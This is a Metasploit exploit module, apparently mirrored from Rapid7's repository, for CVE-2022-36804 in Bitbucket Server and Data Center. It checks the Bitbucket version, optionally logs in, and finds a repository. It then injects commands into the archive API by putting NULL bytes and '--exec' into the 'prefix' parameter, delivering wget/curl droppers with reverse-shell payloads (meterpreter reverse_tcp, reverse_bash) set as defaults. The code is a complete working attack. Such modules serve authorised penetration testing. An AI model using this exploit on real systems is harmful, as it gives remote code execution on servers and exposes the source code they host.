Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/http/bitbucket_git_cmd_injection.rb
31510 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  prepend Msf::Exploit::Remote::AutoCheck

10
  include Msf::Exploit::Remote::HttpClient

11
  include Msf::Exploit::CmdStager

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'Bitbucket Git Command Injection',

18
        'Description' => %q{

19
          Various versions of Bitbucket Server and Data Center are vulnerable to

20
          an unauthenticated command injection vulnerability in multiple API endpoints.

21


22
          The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint

23
          creates an archive of the repository, leveraging the `git-archive` command to do so.

24
          Supplying NULL bytes to the request enables the passing of additional arguments to the

25
          command, ultimately enabling execution of arbitrary commands.

26
        },

27
        'License' => MSF_LICENSE,

28
        'Author' => [

29
          'TheGrandPew', # discovery

30
          'Ron Bowes', # analysis and PoC

31
          'Jang', # testanull - PoC

32
          'Shelby Pace' # Metasploit module

33
        ],

34
        'References' => [

35
          [ 'URL', 'https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/' ],

36
          [ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html' ],

37
          [ 'URL', 'https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis' ],

38
          [ 'URL', 'https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/' ],

39
          [ 'CVE', '2022-36804' ]

40
        ],

41
        'Privileged' => false,

42
        'Targets' => [

43
          [

44
            'Linux Dropper',

45
            {

46
              'Platform' => 'linux',

47
              'Type' => :linux_dropper,

48
              'Arch' => [ ARCH_X86, ARCH_X64 ],

49
              'CmdStagerFlavor' => %w[wget curl bourne],

50
              'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' }

51
            }

52
          ],

53
          [

54
            'Unix Command',

55
            {

56
              'Platform' => 'unix',

57
              'Type' => :unix_cmd,

58
              'Arch' => ARCH_CMD,

59
              'Payload' => { 'BadChars' => %(:/?#[]@) },

60
              'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_bash' }

61
            }

62
          ]

63
        ],

64
        'DisclosureDate' => '2022-08-24',

65
        'DefaultTarget' => 0,

66
        'Notes' => {

67
          'Stability' => [ CRASH_SAFE ],

68
          'Reliability' => [ REPEATABLE_SESSION ],

69
          'SideEffects' => [ IOC_IN_LOGS ]

70
        }

71
      )

72
    )

73


74
    register_options(

75
      [

76
        Opt::RPORT(7990),

77
        OptString.new('TARGETURI', [ true, 'The base URI of Bitbucket application', '/']),

78
        OptString.new('USERNAME', [ false, 'The username to authenticate with', '' ]),

79
        OptString.new('PASSWORD', [ false, 'The password to authenticate with', '' ])

80
      ]

81
    )

82
  end

83


84
  def check

85
    res = send_request_cgi(

86
      'method' => 'GET',

87
      'keep_cookies' => true,

88
      'uri' => normalize_uri(target_uri.path, 'login')

89
    )

90


91
    return CheckCode::Unknown('Failed to receive response from application') unless res

92


93
    unless res.body.include?('Bitbucket')

94
      return CheckCode::Safe('Target does not appear to be Bitbucket')

95
    end

96


97
    footer = res.get_html_document&.at('footer')

98
    return CheckCode::Detected('Cannot determine version of Bitbucket') unless footer

99


100
    version_str = footer.at('span')&.children&.text

101
    return CheckCode::Detected('Cannot find version string in footer') unless version_str

102


103
    matches = version_str.match(/v(\d+\.\d+\.\d+)/)

104
    return CheckCode::Detected('Version unknown') unless matches && matches.length > 1

105


106
    version_str = matches[1]

107
    vprint_status("Found Bitbucket version: #{matches[1]}")

108


109
    num_vers = Rex::Version.new(version_str)

110
    return CheckCode::NotVulnerable if num_vers <= Rex::Version.new('6.10.17')

111


112
    major, minor, revision = version_str.split('.')

113
    case major

114
    when '6'

115
      return CheckCode::Appears

116
    when '7'

117
      case minor

118
      when '6'

119
        return CheckCode::Appears if revision.to_i < 17

120
      when '17'

121
        return CheckCode::Appears if revision.to_i < 10

122
      when '21'

123
        return CheckCode::Appears if revision.to_i < 4

124
      end

125
    when '8'

126
      case minor

127
      when '0', '1'

128
        return CheckCode::Appears if revision.to_i < 3

129
      when '2'

130
        return CheckCode::Appears if revision.to_i < 2

131
      when '3'

132
        return CheckCode::Appears if revision.to_i < 1

133
      end

134
    end

135


136
    CheckCode::Detected

137
  end

138


139
  def username

140
    datastore['USERNAME']

141
  end

142


143
  def password

144
    datastore['PASSWORD']

145
  end

146


147
  def authenticate

148
    print_status("Attempting to authenticate with user '#{username}' and password '#{password}'")

149
    res = send_request_cgi(

150
      'method' => 'GET',

151
      'uri' => normalize_uri(target_uri.path, 'login'),

152
      'keep_cookies' => true

153
    )

154


155
    fail_with(Failure::UnexpectedReply, 'Failed to reach login page') unless res&.body&.include?('login')

156
    res = send_request_cgi(

157
      'method' => 'POST',

158
      'uri' => normalize_uri(target_uri.path, 'j_atl_security_check'),

159
      'keep_cookies' => true,

160
      'vars_post' =>

161
      {

162
        'j_username' => username,

163
        'j_password' => password,

164
        'submit' => 'Log in'

165
      }

166
    )

167


168
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve a response from log in attempt') unless res

169
    res = send_request_cgi(

170
      'method' => 'GET',

171
      'uri' => normalize_uri(target_uri.path, 'dashboard'),

172
      'keep_cookies' => true

173
    )

174


175
    fail_with(Failure::UnexpectedReply, 'Failed to receive a response from the dashboard') unless res

176


177
    unless res.body.include?('Your work') && res.body.include?('Projects')

178
      fail_with(Failure::BadConfig, 'Login failed...Credentials may be invalid')

179
    end

180


181
    @authenticated = true

182
    print_good('Successfully logged into Bitbucket!')

183
  end

184


185
  def find_public_repo

186
    print_status('Searching Bitbucket for publicly accessible repository')

187
    res = send_request_cgi(

188
      'method' => 'GET',

189
      'uri' => normalize_uri(target_uri.path, 'rest/api/latest/repos'),

190
      'keep_cookies' => true

191
    )

192


193
    fail_with(Failure::Disconnected, 'Did not receive a response') unless res

194
    json_data = JSON.parse(res.body)

195
    fail_with(Failure::UnexpectedReply, 'Response had no JSON') unless json_data

196


197
    unless json_data['size'] > 0

198
      fail_with(Failure::NotFound, 'Bitbucket instance has no publicly available repositories')

199
    end

200


201
    # opt for public repos unless none exist.

202
    # Attempt to use a private repo if so

203
    repos = json_data['values']

204
    possible_repos = repos.select { |repo| repo['public'] == true }

205
    if possible_repos.empty? && @authenticated

206
      possible_repos = repos.select { |repo| repo['public'] == false }

207
    end

208


209
    fail_with(Failure::NotFound, 'There doesn\'t appear to be any repos to use') if possible_repos.empty?

210
    possible_repos.each do |repo|

211
      project = repo['project']

212
      next unless project

213


214
      @project = project['key']

215
      @repo = repo['slug']

216
      break if @project && @repo

217
    end

218


219
    fail_with(Failure::NotFound, 'Failed to find a repo to use for exploit') unless @project && @repo

220
    print_good("Found public repo '#{@repo}' in project '#{@project}'!")

221
  end

222


223
  def execute_command(cmd, _opts = {})

224
    uri = normalize_uri(target_uri.path, 'rest/api/latest/projects', @project, 'repos', @repo, 'archive')

225
    send_request_cgi(

226
      'method' => 'GET',

227
      'uri' => uri,

228
      'keep_cookies' => true,

229
      'vars_get' =>

230
      {

231
        'format' => 'zip',

232
        'path' => Rex::Text.rand_text_alpha(2..5),

233
        'prefix' => "#{Rex::Text.rand_text_alpha(1..3)}\x00--exec=`#{cmd}`\x00--remote=#{Rex::Text.rand_text_alpha(3..8)}"

234
      }

235
    )

236
  end

237


238
  def exploit

239
    @authenticated = false

240
    authenticate unless username.blank? && password.blank?

241
    find_public_repo

242


243
    if target['Type'] == :linux_dropper

244
      execute_cmdstager(linemax: 6000)

245
    else

246
      execute_command(payload.encoded)

247
    end

248
  end

249
end

250


251